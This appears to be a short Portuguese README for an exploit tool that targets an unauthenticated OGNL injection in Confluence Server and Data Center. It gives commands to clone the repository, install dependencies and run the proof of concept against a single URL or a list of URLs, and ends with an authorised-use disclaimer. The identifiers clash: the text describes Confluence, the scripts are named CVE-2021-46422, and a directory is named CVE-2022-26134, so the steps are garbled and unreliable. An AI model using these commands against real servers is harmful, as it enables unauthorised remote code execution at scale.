
Nas versões afetadas do Confluence Server e Data Center, existe uma vulnerabilidade de injeção OGNL que permite que um atacante não autenticado execute código arbitrário no servidor Confluence Server ou Data Center.
git clone https://github.com/yigexioabai/CVE-2021-46422-RCE.git
cd CVE-2022-26134-cve1
pip3 install -r requirements.txt
#把CVE-2021-46422 RCE.py放到pocsuite3\pocs目录下
cd pocs
URL única:
pocsuite -r CVE-2021-46422 RCE.py -u url
Múltiplas URLs:
pocsuite -r CVE-2021-46422 RCE.py -f url.txt(url在的文件) --verify
Esta ferramenta é destinada apenas a ações de construção de segurança empresarial legalmente autorizadas. Se você precisar testar a usabilidade desta ferramenta, por favor, configure seu próprio ambiente de teste.
Ao usar esta ferramenta para detecção, você deve garantir que a ação esteja em conformidade com as leis e regulamentos locais e que tenha obtido autorização suficiente. Não escaneie alvos não autorizados.
Se você praticar qualquer ato ilegal durante o uso desta ferramenta, você deverá arcar com as consequências correspondentes, e não assumiremos qualquer responsabilidade legal ou solidária.